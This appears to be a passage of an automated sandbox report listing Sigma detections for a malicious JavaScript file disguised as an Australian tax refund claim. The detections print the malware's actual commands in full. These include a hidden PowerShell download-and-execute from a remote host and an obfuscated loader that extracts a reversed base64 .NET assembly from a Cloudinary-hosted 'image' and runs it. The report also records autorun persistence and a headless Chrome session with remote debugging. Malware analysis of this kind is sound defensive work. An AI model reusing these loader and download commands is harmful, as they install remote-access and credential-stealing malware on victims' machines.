[void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizb

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7796, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js" , ProcessId: 3652, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7296, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7912, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", ProcessId: 7296, ProcessName: wscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 7912, ParentProcessName: MSBuild.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 8092, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", ProcessId: 7796, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7356, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7796, TargetFilename: C:\ProgramData\smudgy.js

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", ProcessId: 7796, ProcessName: powershell.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7296, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7356, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs", Pro

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'", ProcessId: 7796, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizb

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js", ProcessId: 7296, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizb

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizb

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7556, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() | ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizb

Suricata Signatures

